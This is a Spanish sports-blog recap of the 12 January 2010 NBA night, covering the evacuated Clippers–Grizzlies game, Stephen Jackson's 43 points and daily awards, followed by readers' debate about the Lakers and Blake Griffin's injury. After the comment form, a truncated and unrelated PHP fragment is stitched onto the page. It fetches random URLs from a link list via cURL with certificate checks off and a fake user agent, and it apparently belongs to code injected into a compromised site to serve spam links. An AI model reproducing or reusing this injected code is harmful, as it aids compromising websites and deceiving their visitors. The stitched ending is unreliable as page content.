La Crónica (12/01/2010)

13 de January de 2010 por TheDeerHunter

Solemos comenzar nuestras crónicas hablando de las tribulaciones de los más importantes candidatos al anillo. Hoy, sin embargo,  comenzamos con el choque Clippers@Memphis, donde hubo de todo… incluido la evacuación del FedExForum.

Corría el tercer cuarto y los Clippers mandaban de 13 puntos. La renta había llegado a ser de 18, con un Baron Davis renacido que terminaría registrando su 10º triple doble tras dos años sin hacerlo. El 8º jugador en activo que logra esta cifra, tras Kidd, Grant Hill, LeBron, Kobe, CP3, Garnett… y Odom!!. Por los Clippers nadie lo había logrado desde… ¡Elton Brand en el 2003!! Curiosos todos estos datos. El caso es que el sistema de anti-incendios del pabellón saltó accidentalmente y pararon el partido 20 minutitos. Como suele pasar en este tipo de eventualidades, unos aprovecharon el inesperado descanso para reordenar sus ideas y los otros se enfriaron. Marc aprovechó las bajas de Kaman y Camby para hacer la noche de su vida. Los Clippers cedieron algunas pérdidas y rebotes fáciles que terminaron por costarles caro. Otra demostración del carácter de estos nuevos ositos, que van a muerte en busca de los playoffs.No fue la noche para la competencia directa de ambos. Los Rockets se estrellaron en Charlotte contra un Stephen Jackson poseído. Hasta el día de hoy los Bobcats sólo han dejado escapar 4 partidos en su casa. El espíritu de las duras potencias del Este del principio de siglo, que tantos éxitos le han brindado a Larry Brown. Su seña de identidad, sin duda, también su mérito mal que nos pese a algunos.

Los Kings también fueron machacados en casa por un Dwight Howard inconmensurable. Ya ni nos acordábamos de cómo decir aquello de Superman… Para finalizar en el Oeste los Spurs no tuvieron piedad de unos Lakers sin Pau, ni Kobe durante la segunda parte. Eso sí, Bynum está jugando de cine desde que salió a la palestra el rumorcito del trade a cambio de Bosh.

Finalmente, los Pistons han logrado romper su racha negativa doblegando a los Wizards… que tampoco es que sea el rival más difícil del mundo.

PREMIOS

MVP: Explosión de Stephen Jackson con 43 puntos con 15 canastas de 22 intentos. Y además súmale 8 rebotes y 3 robos. Clave en la victoria de los Bobcats frente los Rockets.

Rookie: No ha tenido un gran día Tyreke así que nos quedamos una vez más con Jonas Jebreko (13 puntos y 7 rebotes). Últimamente parece un reloj.

Sorpresa: Grandes partidos de no habituales como Mickael Pietrus (18 puntos y 11 rebotes) o Charlie Villanueva (23 puntos, 9 rebotes). El dominicano nos ha ofrecido su partido bueno del mes. Disfrutémoslo.

Decepción: Para los que nos tiene acostumbrados el partido de ayer de Gerald Wallace fue más bien flojo. 9 puntos y 8 rebotes, números de mortal.

Esfuerzo en vano: Antawn Jamison está pasando un auténtico calvario en los Wizards y aún así sigue siendo su jugador más destacado. Anoche se cascó 31 puntos y 10 rebotes. ¿Cuántos equipos deben suspirar por sus servicios? De toda manera el auténtico esfuerzo en vano del día es el triple doble de Baron Davis. 27 puntos, 12 rebotes y 12 asistencias tirados a la basura…

Comenta

10 comentarios a esta entrada

  1. arivas dice:
    #1

    Lo de Marc está siendo brutal, sin palabras. No sé si irá al All-Star o no, pero desde luego su temporada es para enmarcar. Y los Grizzlies pues cada vez dan mas sensación de equipo serio, la verdad que la lucha por los PO en el oeste va a ser muy muy bonita.

      Citar

  2. Love Denise dice:
    #2

    No estoy de acuerdo con deer en que Bynum está jugando de cine, esta noche ha necesitado 23 tiros para anotar 23 puntos, los rebotes que coge me parecen escasos para los minutos que juega y el fisico que tiene, y su defensa deja bastante que desear. No quiero ser ventajista, pero cada partido que pasa, Odom me parece mas malo y más cagado, me parece indecente que se tire tan solo 6 tiros en 40 minutos sin Pau y con Kobe a medio gas. Fisher no defiende en absoluto; lo digo desde diciembre, excepto Pau, Kobe y Brown, el resto estan horribles y fuera de forma, es mal sintoma que hayan necesitado el ultimo mes a un Kobe al nivel igual o superior a Jordan, canastas en el último segundo, y a un excelente Gasol para ganar.

    Del resto, gran partido colectivo de Orlando, horroroso ultimo cuarto de Sacto, resurrecion de Baron Davis y Villanueva, y excelentes Grizzlies con un gran Marc.

      Citar

  3. Viva_Dirk dice:
    #3

    A ver con que números acaba S.Jackson la temporada, parece tener total libertad por parte de Brown y se le ve implicado.

    Coincido con arivas, va a ser tremenda la lucha por los play-offs en el Oeste con Memphis, Clippers, Hornets y alguno mas sin dar tregua.

      Citar

  4. TheDeerHunter dice:
    #4

    @LDenise, lo dices como si Bynum hubiera lanzado mal o algo así… prácticamente un 50% en tiro contra Duncan, que no es de los que se chupa el dedo. Duncan no metió muchos más tiros ni tiró muchos menos… y fue defendido por él. Ya me daría yo con un canto en los dientes con actuaciones como las dos últimas ahora cuando vuelva Gasol. Ya te digo yo que serían campeones de fijo si juega a este nivel el resto de la temporada.

    El asunto, LDenise es que no estás acostumbrado a la ideosincrasia de este equipo, en lo negativo que señalas. Peor que jugó Fisher los playoffs del año pasado no lo está haciendo ahora… y nos valió un anillo. Más que se dejó llevar Odom durante todo el curso pasado no lo está haciendo ahora y fíjate como jugó en los playoffs. No te quiero hablar de Horry y sus temporadas sabáticas en L.A. que salían a título por año…
    Es un defecto, claro, y en muchas ocasiones soy el primero en desesperarme (joder, que cada noche que me quedo a verles pierden, los muy mamones!!!) pero forma parte de nuestras tribulaciones… y estará bien si bien acaba. Es así.

    El año pasado por estas fechas, también perdiamos partidos con Kobe haciendo triples dobles… de hecho llevábamos ya las dos derrotas contra Orlando. Ya ves tú.

    Por cierto, hay que decir también que volvió Walton y lo hizo bien… y además de Brown, Artest está jugando francamente bien en general (y mejorando mucho al equipo) y Farmar también lo está haciendo francamente bien (notición!!!) No todo es tan negativo.

      Citar

  5. TheDeerHunter dice:
    #5

    Y un detalle más… para que nos hagamos una composición de lugar: Odom se ha tirado 322 tiros en 38 partidos jugados, siendo 6º hombre, 4ª o 5ª espada o lo que sea él… Dwight Howard se ha tirado 349.

      Citar

  6. Love Denise dice:
    #6

    soy el primero en criticar a Vgundy por los pocos balones que se le dan a Howard en la pintura, pero tambien hay que tener en cuenta que muchos “tiros” de Howard no acaban en tiros realmente porque al final acaban haciendole falta y se va a los tiros libres, por ejemplo, howard lleva como 300 tiros libres mas que Odom.
    Fisher jugo mal, pero al final nos clavó 2 triplazos en momentos decisivos, en ataque nunca ha sido manco, el problema es que en cada partido el base rival se forra a puntos, bien es cierto que hoy era Parker. Sobre Bynum, cierto que estuvo defendido por Duncan, pero me sigue pareciendo insuficiente su actuacion, ya no solo la de hoy, tambien partidos atras como contra los Blazers, que no tenian ningun 5. Sobre Artest, cada vez que lo veo, pienso que en cualquier momento se el va a ir la olla y la va a liar, en perjuicio de su equipo.
    total, no los veo infinitamente superior, y si siguen con este nivel, pienso que no repiten el anillo.
    si se confirma lo de Jamison por los Cavs, creo que serían el rival a batir.

      Citar

  7. HeiNeKeN dice:
    #7

    Adios a Blake Griffin…

      Citar

  8. Txusma dice:
    #8

    Madre mía que palo…

      Citar

  9. NBA LAKERS BLOG dice:
    #9

    Curioso, y muy interesante lo del Clippers @ Grizzlies, jaja.

    Te espero por nuestro blog de los Lakers! 😉

    Un abrazo grande!

    –NM–

      Citar

  10. pcerezo dice:
    #10

    La maldición del número 1. Vaya tela, Griffin se pierde toda la temporada y la porra del blog se va a la mierda.

    Si hemos estado alabando a Rick Adelman en los Rockets y Westphal en Kings, ojito a Lionel Hollins en Grizzlies, para mi sin pestañear entrenador del año. Conseguir que todos esos jugones jueguen en equipo tiene mérito y mucho.

    Un saludo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>